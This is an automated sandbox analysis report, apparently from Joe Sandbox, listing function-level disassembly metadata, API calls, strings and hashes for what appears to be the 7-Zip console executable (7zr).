6e82a3-6e82ab call 6b965d 835->839 836->828 838->830 838->831 839->836
                              APIs
                              • __EH_prolog.LIBCMT ref: 006E8017
                              • fputs.MSVCRT ref: 006E804D
                                • Part of subcall function 006E8341: __EH_prolog.LIBCMT ref: 006E8346
                                • Part of subcall function 006E8341: fputs.MSVCRT ref: 006E835B
                                • Part of subcall function 006E8341: fputs.MSVCRT ref: 006E8364
                              • fputs.MSVCRT ref: 006E807A
                                • Part of subcall function 006B1FA0: fputc.MSVCRT ref: 006B1FA7
                                • Part of subcall function 006B965D: VariantClear.OLEAUT32(?), ref: 006B967F
                              • SysFreeString.OLEAUT32(00000000), ref: 006E81AA
                              • fputs.MSVCRT ref: 006E81CD
                              • SysFreeString.OLEAUT32(00000000), ref: 006E8267
                              • SysFreeString.OLEAUT32(00000000), ref: 006E82B1
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                              • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: fputs$FreeString$H_prolog$ClearVariantfputc
                              • String ID: --$----$Path$Type$Warning: The archive is open with offset
                              • API String ID: 2889736305-3797937567
                              • Opcode ID: 8649e65e8bd05d02f71fa31ba1d0721e83f9623f01bb600a529554d47e53d556
                              • Instruction ID: 52fa88a0054d3a3ab2045be9401ed2b5fc73043e47b276f29eddfefb334aacf1
                              • Opcode Fuzzy Hash: 8649e65e8bd05d02f71fa31ba1d0721e83f9623f01bb600a529554d47e53d556
                              • Instruction Fuzzy Hash: 36918B71A01745EFDB14DFA5C981AEEB7B6FF48310F20412DE50AA7291DB70AE05CB64
                              Function 006E6766 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 135COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 846 6e6766-6e6792 call 74fb10 EnterCriticalSection 849 6e67af-6e67b7 846->849 850 6e6794-6e6799 call 6ec7d7 846->850 852 6e67be-6e67c3 849->852 853 6e67b9 call 6b1f91 849->853 854 6e679e-6e67ac 850->854 856 6e67c9-6e67d5 852->856 857 6e6892-6e68a8 852->857 853->852 854->849 860 6e6817-6e682f 856->860 861 6e67d7-6e67dd 856->861 858 6e68ae-6e68b4 857->858 859 6e6941 857->859 858->859 863 6e68ba-6e68c2 858->863 866 6e6943-6e695a 859->866 864 6e6873-6e687b 860->864 865 6e6831-6e6842 call 6b1fa0 860->865 861->860 862 6e67df-6e67eb 861->862 867 6e67ed 862->867 868 6e67f3-6e6801 862->868 869 6e68c4-6e68e6 call 6b1fa0 fputs 863->869 870 6e6933-6e693f call 6ec5cd 863->870 864->870 872 6e6881-6e6887 864->872 865->864 883 6e6844-6e686c fputs call 6b2201 865->883 867->868 868->864 873 6e6803-6e6815 fputs 868->873 885 6e68fb-6e6917 call 6c4f2a call 6b1fb3 call 6b1e40 869->885 886 6e68e8-6e68f9 fputs 869->886 870->866 872->870 878 6e688d 872->878 880 6e686e call 6b1fa0 873->880 879 6e692e call 6b1f91 878->879 879->870 880->864 883->880 889 6e691c-6e6928 call 6b1fa0 885->889 886->889 889->879
                              APIs
                              • __EH_prolog.LIBCMT ref: 006E676B
                              • EnterCriticalSection.KERNEL32(00772938), ref: 006E6781
                              • fputs.MSVCRT ref: 006E680B
                              • LeaveCriticalSection.KERNEL32(00772938), ref: 006E6944
                                • Part of subcall function 006EC7D7: fputs.MSVCRT ref: 006EC840
                              • fputs.MSVCRT ref: 006E6851
                                • Part of subcall function 006B2201: fputs.MSVCRT ref: 006B221E
                              • fputs.MSVCRT ref: 006E68D9
                              • fputs.MSVCRT ref: 006E68F6
                                • Part of subcall function 006B1FA0: fputc.MSVCRT ref: 006B1FA7
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                              • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: fputs$CriticalSection$EnterH_prologLeavefputc
                              • String ID: v$8)w$8)w$Sub items Errors:
                              • API String ID: 2670240366-2667054159
                              • Opcode ID: 5ac720f2412acf097fc64a21aa0a1d9b25cb1b1d9b7b2aa767a1dd4b14b95211
                              • Instruction ID: b28aafd8b58920eb84b267b1fb62f601ddee393a33825ab22a550ea87aa3eef9
                              • Opcode Fuzzy Hash: 5ac720f2412acf097fc64a21aa0a1d9b25cb1b1d9b7b2aa767a1dd4b14b95211
                              • Instruction Fuzzy Hash: 0F51CF31502780DFCB259F61D8A4AEAB7E3FFA4350F54842DE19A8B261CB747C85CB54
                              Function 006E6359 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 252COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 898 6e6359-6e6373 call 74fb10 901 6e639e-6e63af call 6e5a4d 898->901 902 6e6375-6e6385 call 6ec7d7 898->902 908 6e65ee-6e65f1 901->908 909 6e63b5-6e63cd 901->909 902->901 907 6e6387-6e639b 902->907 907->901 912 6e6624-6e663c 908->912 913 6e65f3-6e65fb 908->913 910 6e63cf 909->910 911 6e63d2-6e63d4 909->911 910->911 916 6e63df-6e63e7 911->916 917 6e63d6-6e63d9 911->917 914 6e663e call 6b1f91 912->914 915 6e6643-6e664b 912->915 918 6e66ea call 6ec5cd 913->918 919 6e6601-6e6607 call 6e8012 913->919 914->915 915->918 923 6e6651-6e668f fputs call 6b211a call 6b1fa0 call 6e8685 915->923 924 6e63e9-6e63f2 call 6b1fa0 916->924 925 6e6411-6e6413 916->925 917->916 922 6e64b1-6e64bc call 6e6700 917->922 933 6e66ef-6e66fd 918->933 927 6e660c-6e660e 919->927 944 6e64be-6e64c1 922->944 945 6e64c7-6e64cf 922->945 923->933 980 6e6691-6e6697 923->980 924->925 949 6e63f4-6e640c call 6b210c call 6b1fa0 924->949 928 6e6415-6e641d 925->928 929 6e6442-6e6446 925->929 927->933 934 6e6614-6e661f call 6b1fa0 927->934 935 6e641f-6e6425 call 6e6134 928->935 936 6e642a-6e643b 928->936 938 6e6448-6e6450 929->938 939 6e6497-6e649f 929->939 934->918 935->936 936->929 946 6e647f-6e6490 938->946 947 6e6452-6e647a fputs call 6b1fa0 call 6b1fb3 call 6b1fa0 938->947 939->922 950 6e64a1-6e64ac call 6b1fa0 call 6b1f91 939->950 944->945 953 6e65a2-6e65a6 944->953 954 6e64f9-6e64fb 945->954 955 6e64d1-6e64da call 6b1fa0 945->955 946->939 947->946 949->925 950->922 962 6e65da-6e65e6 953->962 963 6e65a8-6e65b6 953->963 959 6e64fd-6e6505 954->959 960 6e652a-6e652e 954->960 955->954 985 6e64dc-6e64f4 call 6b210c call 6b1fa0 955->985 968 6e6507-6e650d call 6e6134 959->968 969 6e6512-6e6523 959->969 971 6e657f-6e6587 960->971 972 6e6530-6e6538 960->972 962->909 977 6e65ec 962->977 973 6e65b8-6e65ca call 6e6244 963->973 974 6e65d3 963->974 968->969 969->960 971->953 987 6e6589-6e6595 call 6b1fa0 971->987 982 6e653a-6e6562 fputs call 6b1fa0 call 6b1fb3 call 6b1fa0 972->982 983 6e6567-6e6578 972->983 973->974 999 6e65cc-6e65ce call 6b1f91 973->999 974->962 977->908 988 6e66df-6e66e5 call 6b1f91 980->988 989 6e6699-6e669f 980->989 982->983 983->971 985->954 987->953 1002 6e6597-6e659d call 6b1f91 987->1002 988->918 996 6e66b3-6e66ce call 6c4f2a call 6b1fb3 call 6b1e40 989->996 997 6e66a1-6e66b1 fputs 989->997 1003 6e66d3-6e66da call 6b1fa0 996->1003 997->1003 999->974 1002->953 1003->988
                              APIs
                              • __EH_prolog.LIBCMT ref: 006E635E
                              • fputs.MSVCRT ref: 006E645F
                                • Part of subcall function 006EC7D7: fputs.MSVCRT ref: 006EC840
                              • fputs.MSVCRT ref: 006E6547
                              • fputs.MSVCRT ref: 006E665F
                              • fputs.MSVCRT ref: 006E66AE
                                • Part of subcall function 006B1F91: fflush.MSVCRT ref: 006B1F93
                                • Part of subcall function 006B1FB3: __EH_prolog.LIBCMT ref: 006B1FB8
                                • Part of subcall function 006B1E40: free.MSVCRT ref: 006B1E44
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                              • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: fputs$H_prolog$fflushfree
                              • String ID: Can't allocate required memory$ERRORS:$WARNINGS:
                              • API String ID: 1750297421-1898165966
                              • Opcode ID: 445b5695cb18d714ac497d833776b84f835ee5eb18e3471f807b107ae69a9918
                              • Instruction ID: ed84552b95a038d88da04fbf8207de8de94865056a5a6c4f239de9ed13dc03f8
                              • Opcode Fuzzy Hash: 445b5695cb18d714ac497d833776b84f835ee5eb18e3471f807b107ae69a9918
                              • Instruction Fuzzy Hash: ECB199706027419FDB64EF61C9A1BEAB7F3BF54344F40882DE55A4B292CB70A984CF54
                              Function 006E84A7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                              • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: fputs$H_prolog
                              • String ID: =
                              • API String ID: 2614055831-2525689732
                              • Opcode ID: 1326ae821c1347fd92cd41a9e29ebabd646dabef081feedd9b0b5439abcdf78c
                              • Instruction ID: d2e29914686dbfc469503ce51ece7162d5f0119b811619756bd899bb30b8fe13
                              • Opcode Fuzzy Hash: 1326ae821c1347fd92cd41a9e29ebabd646dabef081feedd9b0b5439abcdf78c
                              • Instruction Fuzzy Hash: 6A219D72905248AFCF49EB94D952AEEBBB6EF44310F20002EE40573191DF756E85CB98
                              Function 006E8341 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 006E8346
                              • fputs.MSVCRT ref: 006E835B
                              • fputs.MSVCRT ref: 006E8364
                                • Part of subcall function 006E83BF: __EH_prolog.LIBCMT ref: 006E83C4
                                • Part of subcall function 006E83BF: fputs.MSVCRT ref: 006E8401
                                • Part of subcall function 006E83BF: fputs.MSVCRT ref: 006E8437
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                              • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: fputs$H_prolog
                              • String ID: =
                              • API String ID: 2614055831-2525689732
                              • Opcode ID: e680bc74540a0320fbd976458ceeb9891fe12c81ffd57031d3bb14e406a3cbed
                              • Instruction ID: bcd45e02a9199fc6d957359f41661d19d91229284ccf3008761afd350703cf7f
                              • Opcode Fuzzy Hash: e680bc74540a0320fbd976458ceeb9891fe12c81ffd57031d3bb14e406a3cbed
                              • Instruction Fuzzy Hash: F901A771A00544ABCB05BBA5D822AEE7B77EF84750F00401DF40556191CF784A96DB95
                              Function 006D2096 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 722COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 006D209B
                                • Part of subcall function 006B757D: GetLastError.KERNEL32(006BD14C), ref: 006B757D
                                • Part of subcall function 006D2C6C: __EH_prolog.LIBCMT ref: 006D2C71
                                • Part of subcall function 006B1E40: free.MSVCRT ref: 006B1E44
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                              • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: H_prolog$ErrorLastfree
                              • String ID: Cannot find archive file$The item is a directory
                              • API String ID: 683690243-1569138187
                              • Opcode ID: 1ec2a1bbd9d7980ab7947dde13e14ca168fe7e5138a8963128fc17c0c07c7e6d
                              • Instruction ID: 849e097036076aa5f7a6cfd9d5ea1f3b00705d186ff90d26f879408635c24780
                              • Opcode Fuzzy Hash: 1ec2a1bbd9d7980ab7947dde13e14ca168fe7e5138a8963128fc17c0c07c7e6d
                              • Instruction Fuzzy Hash: 98724970D00259DFCB65DF68C8A4BDDBBB2AF59300F14409AE859AB352CB70AE81CF55
                              Function 006DA7C5 Relevance: 5.1, APIs: 2, Strings: 1, Instructions: 606COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 006B1E40: free.MSVCRT ref: 006B1E44
                              • memset.MSVCRT ref: 006DAEBA
                              • memset.MSVCRT ref: 006DAECD
                                • Part of subcall function 006F04D2: _CxxThrowException.MSVCRT(?,00764A58), ref: 006F04F8
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                              • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: memset$ExceptionThrowfree
                              • String ID: Split
                              • API String ID: 1404239998-1882502421
                              • Opcode ID: 2f715c1dce0df3d02a183103560cefd40c5c989a88c8e1386e2f561ee1a3da05
                              • Instruction ID: 27d2b6f60b32149e5f1853d05429e02b5dd339c72d24f9ac3f8bb897d316f43b
                              • Opcode Fuzzy Hash: 2f715c1dce0df3d02a183103560cefd40c5c989a88c8e1386e2f561ee1a3da05
                              • Instruction Fuzzy Hash: 1F425A70E04249DFDF25DBA4C994BEDBBB2AF05314F14409AE449AB351CB71AE86CF12
                              Function 006B6096 Relevance: 4.6, APIs: 3, Instructions: 64fileCOMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 006B609B
                                • Part of subcall function 006B6BF5: __EH_prolog.LIBCMT ref: 006B6BFA
                                • Part of subcall function 006B6BF5: GetFileAttributesW.KERNELBASE(?,?,?,00000000,?), ref: 006B6C1A
                                • Part of subcall function 006B6BF5: GetFileAttributesW.KERNEL32(?,00000000,?,?,00000000,?), ref: 006B6C49
                              • DeleteFileW.KERNELBASE(?,?,?,00000000), ref: 006B60DF
                              • DeleteFileW.KERNEL32(?,00000000,?,?,00000000), ref: 006B6111
                                • Part of subcall function 006B5A8C: __EH_prolog.LIBCMT ref: 006B5A91
                                • Part of subcall function 006B5A8C: SetFileAttributesW.KERNELBASE(?,?,?,?,00000000), ref: 006B5AB7
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                              • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: File$AttributesH_prolog$Delete
                              • String ID:
                              • API String ID: 579516761-0
                              • Opcode ID: 25bdaf976a40e2dcbb68c5f8f2f517076784a457ea0aa0e58e75d16ab5b218f5
                              • Instruction ID: c4a41749d47fcdbc34b58af9021984bda47e0e3d04b01e7b480fb38c4213a310
                              • Opcode Fuzzy Hash: 25bdaf976a40e2dcbb68c5f8f2f517076784a457ea0aa0e58e75d16ab5b218f5
                              • Instruction Fuzzy Hash: 6E11E9F2A00204978E147679D5526FE7B579F823A4F144129FD12573D2CE298CC69760
                              Function 006E83BF Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                              Download Yara Rule
                              APIs
                              • fputs.MSVCRT ref: 006E8437
                              • fputs.MSVCRT ref: 006E8401
                                • Part of subcall function 006B1FB3: __EH_prolog.LIBCMT ref: 006B1FB8
                              • __EH_prolog.LIBCMT ref: 006E83C4
                                • Part of subcall function 006B1FA0: fputc.MSVCRT ref: 006B1FA7
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                              • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: H_prologfputs$fputc
                              • String ID:
                              • API String ID: 678540050-0
                              • Opcode ID: 67c57f00313b4593704319d0391d2858bbe5740e2a94f71ba74c919c7898a8a0
                              • Instruction ID: a5771999cc3ec8b53710a827e1409d85b56d788089276bd098113dabaed0335d
                              • Opcode Fuzzy Hash: 67c57f00313b4593704319d0391d2858bbe5740e2a94f71ba74c919c7898a8a0
                              • Instruction Fuzzy Hash: 4E1151B1A04215ABCB4AB7A1D8235EEBBFBDF41750F40002DF501972D1DF695985C798
                              Function 006E6086 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                              • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: fputs
                              • String ID: Open
                              • API String ID: 1795875747-71445658
                              • Opcode ID: fe27af77eff6ab77d0151f18d4012ea557cf39d600435308a3a0809abfbfe3c0
                              • Instruction ID: cc80883896bd0a2cbcc822e2e84f326791fc4b47284adb8cd2ecf9a7fbb45f86
                              • Opcode Fuzzy Hash: fe27af77eff6ab77d0151f18d4012ea557cf39d600435308a3a0809abfbfe3c0
                              • Instruction Fuzzy Hash: 6A1102720027449FD761EF39DCA1ADABBE6FF21310F40842EE19A87212DB75A844CF58
                              Function 007006AE Relevance: 3.2, APIs: 2, Instructions: 206COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 007006B3
                              • _CxxThrowException.MSVCRT(?,0076D480), ref: 007008F2
                                • Part of subcall function 006B1E0C: malloc.MSVCRT ref: 006B1E1F
                                • Part of subcall function 006B1E0C: _CxxThrowException.MSVCRT(?,00764B28), ref: 006B1E39
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                              • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: ExceptionThrow$H_prologmalloc
                              • String ID:
                              • API String ID: 3044594480-0
                              • Opcode ID: 873ef010ea6bd353f82d635554cf9c150a359b209831a6652d80f5cbddaa1b69
                              • Instruction ID: cfc9c6fbebf35abb7ee3dfa40d9160837da5145fa98bcd48ca2d17bc32fec56e
                              • Opcode Fuzzy Hash: 873ef010ea6bd353f82d635554cf9c150a359b209831a6652d80f5cbddaa1b69
                              • Instruction Fuzzy Hash: 14914C70900249DFCF21DFA8C891AEEBBB6BF09314F14819DE545A7292C734AE45CFA1
                              Function 006C6305 Relevance: 1.9, APIs: 1, Instructions: 377COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                              • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 46c9997dfd5f977fb9e37b65a7a9e60f2dda0a5a255bf75eb15b75cd4f247e44
                              • Instruction ID: 1f5a680eb4f30266ae47130dd00b44e9c858767f5e4ff923756862dd88d2d456
                              • Opcode Fuzzy Hash: 46c9997dfd5f977fb9e37b65a7a9e60f2dda0a5a255bf75eb15b75cd4f247e44
                              • Instruction Fuzzy Hash: 25F19A70504785DFCB21CF64C594AFABBE2FF15304F64886EE49A9B311D730A984CB6A
                              Function 006C4250 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 006C4255
                                • Part of subcall function 006C440B: __EH_prolog.LIBCMT ref: 006C4410
                                • Part of subcall function 006B1E0C: malloc.MSVCRT ref: 006B1E1F
                                • Part of subcall function 006B1E0C: _CxxThrowException.MSVCRT(?,00764B28), ref: 006B1E39
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                              • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: H_prolog$ExceptionThrowmalloc
                              • String ID:
                              • API String ID: 3744649731-0
                              • Opcode ID: 6fdad4b41a5f687f1f481b6766435e957518720510eb5ad416ef2f2a4d606ede
                              • Instruction ID: 95c95946440c4a479a1b77c883732c68248e9f0021840566acc1df64538e4a33
                              • Opcode Fuzzy Hash: 6fdad4b41a5f687f1f481b6766435e957518720510eb5ad416ef2f2a4d606ede
                              • Instruction Fuzzy Hash: 5951E7B0401784CFC725DF69C194ADAFBF0FF19304F5488AEC49A97652D7B4AA09CB61
                              Function 006D062E Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                              • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 3b304273a3beee0661173d756adcd7a42adac0f179d76835ddc8c7bc6b505b4f
                              • Instruction ID: bc43439c7ea33e64770e0588ababb440b518795b715900fe34df88d063513138
                              • Opcode Fuzzy Hash: 3b304273a3beee0661173d756adcd7a42adac0f179d76835ddc8c7bc6b505b4f
                              • Instruction Fuzzy Hash: 8C3118B0D00249DBDB14EF95C8A19EEBBBAFF85360F20811EE42667341C7309D01CBA0
                              Function 006D021A Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 006D021F
                                • Part of subcall function 006C3D66: __EH_prolog.LIBCMT ref: 006C3D6B
                                • Part of subcall function 006C3D66: GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 006C3D7D
                                • Part of subcall function 006C3D66: OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 006C3D94
                                • Part of subcall function 006C3D66: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 006C3DB6
                                • Part of subcall function 006C3D66: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 006C3DCB
                                • Part of subcall function 006C3D66: GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 006C3DD5
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                              • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmpDownload File
